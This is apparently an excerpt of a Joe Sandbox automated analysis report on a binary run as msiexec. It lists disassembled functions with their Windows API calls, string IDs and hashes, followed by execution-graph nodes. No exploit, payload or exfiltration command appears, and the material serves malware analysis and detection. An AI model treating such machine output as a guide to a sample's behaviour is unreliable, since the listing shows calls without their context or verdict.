                                                                    • API String ID: 1983396471-123907689
                                                                    • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                    • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                    Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                    • _memicmp.MSVCRT ref: 0040C00D
                                                                    • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer_memicmpmemcpy
                                                                    • String ID: URL
                                                                    • API String ID: 2108176848-3574463123
                                                                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                    Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _snwprintf.MSVCRT ref: 0040A398
                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintfmemcpy
                                                                    • String ID: %2.2X
                                                                    • API String ID: 2789212964-323797159
                                                                    • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                    • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                    Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintf
                                                                    • String ID: %%-%d.%ds
                                                                    • API String ID: 3988819677-2008345750
                                                                    • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                    • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                    Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040E770
                                                                    • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendmemset
                                                                    • String ID: F^@
                                                                    • API String ID: 568519121-3652327722
                                                                    • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                    • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                    Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PlacementWindowmemset
                                                                    • String ID: WinPos
                                                                    • API String ID: 4036792311-2823255486
                                                                    • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                    • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                    Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                    • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@DeleteObject
                                                                    • String ID: r!A
                                                                    • API String ID: 1103273653-628097481
                                                                    • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                    • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                    Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                    • wcsrchr.MSVCRT ref: 0040DCE9
                                                                    • wcscat.MSVCRT ref: 0040DCFF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                    • String ID: _lng.ini
                                                                    • API String ID: 383090722-1948609170
                                                                    • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                    • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                    • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                    • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                    Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                    • API String ID: 2773794195-880857682
                                                                    • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                    • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                    Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                    • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                    • memset.MSVCRT ref: 0042BAAE
                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID:
                                                                    • API String ID: 438689982-0
                                                                    • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                    • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                    Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$memset
                                                                    • String ID:
                                                                    • API String ID: 1860491036-0
                                                                    • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                    • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                    Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                    • free.MSVCRT ref: 0040A908
                                                                    • free.MSVCRT ref: 0040A92B
                                                                    • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free$memcpy$mallocwcslen
                                                                    • String ID:
                                                                    • API String ID: 726966127-0
                                                                    • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                    • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                    Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                                    • free.MSVCRT ref: 0040B201
                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                    • free.MSVCRT ref: 0040B224
                                                                    • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free$memcpy$mallocwcslen
                                                                    • String ID:
                                                                    • API String ID: 726966127-0
                                                                    • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                    • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                    Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                      • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                    • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                    • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                    • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp$memcpy
                                                                    • String ID:
                                                                    • API String ID: 231171946-0
                                                                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                    Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 0040B0D8
                                                                    • free.MSVCRT ref: 0040B0FB
                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                    • free.MSVCRT ref: 0040B12C
                                                                    • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free$memcpy$mallocstrlen
                                                                    • String ID:
                                                                    • API String ID: 3669619086-0
                                                                    • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                    • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                    Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@
                                                                    • String ID:
                                                                    • API String ID: 1033339047-0
                                                                    • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                    • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                    Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                    • malloc.MSVCRT ref: 00417407
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                    • free.MSVCRT ref: 00417425
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                    • String ID:
                                                                    • API String ID: 2605342592-0
                                                                    • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                    • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                    Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: wcslen$wcscat$wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1961120804-0
                                                                    • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                    • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                    Execution Graph

                                                                    Execution Coverage:2.1%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0.5%
                                                                    Total number of Nodes:762
                                                                    Total number of Limit Nodes:20
                                                                    execution_graph 34006 40fc40 70 API calls 34181 403640 21 API calls 34007 427fa4 42 API calls 34182 412e43 _endthreadex 34183 425115 76 API calls __fprintf_l 34184 43fe40 133 API calls 34010 425115 83 API calls __fprintf_l 34011 401445 memcpy memcpy DialogBoxParamA 34012 440c40 34 API calls 33227 444c4a 33246 444e38 33227->33246 33229 444c56 GetModuleHandleA 33230 444c68 __set_app_type __p__fmode __p__commode 33229->33230 33232 444cfa 33230->33232 33233 444d02 __setusermatherr 33232->33233 33234 444d0e 33232->33234 33233->33234 33247 444e22 _controlfp 33234->33247 33236 444d13 _initterm __getmainargs _initterm 33237 444d6a GetStartupInfoA 33236->33237 33239 444d9e GetModuleHandleA 33237->33239 33248 40cf44 33239->33248 33243 444dcf _cexit 33245 444e04 33243->33245 33244 444dc8 exit 33244->33243 33246->33229 33247->33236 33299 404a99 LoadLibraryA 33248->33299 33250 40cf60 33251 40cf64 33250->33251 33307 410d0e 33250->33307 33251->33243 33251->33244 33253 40cf6f 33311 40ccd7 ??2@YAPAXI 33253->33311 33255 40cf9b 33325 407cbc 33255->33325 33260 40cfc4 33344 409825 memset 33260->33344 33261 40cfd8 33349 4096f4 memset 33261->33349 33266 40d181 ??3@YAXPAX 33268 40d1b3 33266->33268 33269 40d19f DeleteObject 33266->33269 33267 407e30 _strcmpi 33270 40cfee 33267->33270 33373 407948 free free 33268->33373 33269->33268 33272 40cff2 RegDeleteKeyA 33270->33272 33273 40d007 EnumResourceTypesA 33270->33273 33272->33266 33275 40d047 33273->33275 33276 40d02f MessageBoxA 33273->33276 33274 40d1c4 33374 4080d4 free 33274->33374 33278 40d0a0 CoInitialize 33275->33278 33354 40ce70 33275->33354 33276->33266 33371 40cc26 strncat memset RegisterClassA CreateWindowExA 33278->33371 33281 40d1cd 33375 407948 free free 33281->33375 33283 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33372 40c256 PostMessageA 33283->33372 33285 40d061 ??3@YAXPAX 33285->33268 33288 40d084 DeleteObject 33285->33288 33286 40d09e 33286->33278 33288->33268 33291 40d0f9 GetMessageA 33292 40d17b CoUninitialize 33291->33292 33293 40d10d 33291->33293 33292->33266 33294 40d113 TranslateAccelerator 33293->33294 33296 40d145 IsDialogMessage 33293->33296 33297 40d139 IsDialogMessage 33293->33297 33294->33293 33295 40d16d GetMessageA 33294->33295 33295->33292 33295->33294 33296->33295 33298 40d157 TranslateMessage DispatchMessageA 33296->33298 33297->33295 33297->33296 33298->33295 33300 404ac4 GetProcAddress 33299->33300 33301 404aec 33299->33301 33302 404ad4 33300->33302 33303 404add FreeLibrary 33300->33303 33305 404b13 33301->33305 33306 404afc MessageBoxA 33301->33306 33302->33303 33303->33301 33304 404ae8 33303->33304 33304->33301 33305->33250 33306->33250 33308 410d17 LoadLibraryA 33307->33308 33309 410d3c 33307->33309 33308->33309 33310 410d2b GetProcAddress 33308->33310 33309->33253 33310->33309 33312 40cd08 ??2@YAPAXI 33311->33312 33314 40cd26 33312->33314 33316 40cd2d 33312->33316 33383 404025 6 API calls 33314->33383 33317 40cd66 33316->33317 33318 40cd59 DeleteObject 33316->33318 33376 407088 33317->33376 33318->33317 33320 40cd6b 33379 4019b5 33320->33379 33323 4019b5 strncat 33324 40cdbf _mbscpy 33323->33324 33324->33255 33385 407948 free free 33325->33385 33327 407e04 33386 407a55 33327->33386 33330 407a1f malloc memcpy free free 33332 407cf7 33330->33332 33331 407ddc 33331->33327 33391 407a1f 33331->33391 33332->33327 33332->33330 33332->33331 33334 407d83 33332->33334 33335 407d7a free 33332->33335 33389 40796e 7 API calls 33332->33389 33334->33332 33390 406f30 malloc memcpy free 33334->33390 33335->33332 33340 407e30 33342 407e38 33340->33342 33343 407e57 33340->33343 33341 407e41 _strcmpi 33341->33342 33341->33343 33342->33341 33342->33343 33343->33260 33343->33261 33399 4097ff 33344->33399 33346 409854 33404 409731 33346->33404 33350 4097ff 3 API calls 33349->33350 33351 409723 33350->33351 33424 40966c 33351->33424 33438 4023b2 33354->33438 33360 40ced3 33522 40cdda 7 API calls 33360->33522 33361 40cece 33364 40cf3f 33361->33364 33475 40c3d0 memset GetModuleFileNameA strrchr 33361->33475 33364->33285 33364->33286 33367 40ceed 33501 40affa 33367->33501 33371->33283 33372->33291 33373->33274 33374->33281 33375->33251 33384 406fc7 memset _mbscpy 33376->33384 33378 40709f CreateFontIndirectA 33378->33320 33380 4019e1 33379->33380 33381 4019c2 strncat 33380->33381 33382 4019e5 memset LoadIconA 33380->33382 33381->33380 33382->33323 33383->33316 33384->33378 33385->33332 33387 407a65 33386->33387 33388 407a5b free 33386->33388 33387->33340 33388->33387 33389->33332 33390->33334 33392 407a38 33391->33392 33393 407a2d free 33391->33393 33398 406f30 malloc memcpy free 33392->33398 33396 407a44 33393->33396 33395 407a43 33395->33396 33397 40796e 7 API calls 33396->33397 33397->33327 33398->33395 33415 406f96 GetModuleFileNameA 33399->33415 33401 409805 strrchr 33402 409814 33401->33402 33403 409817 _mbscat 33401->33403 33402->33403 33403->33346 33416 44b090 33404->33416 33409 40930c 3 API calls 33410 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33409->33410 33411 4097c5 LoadStringA 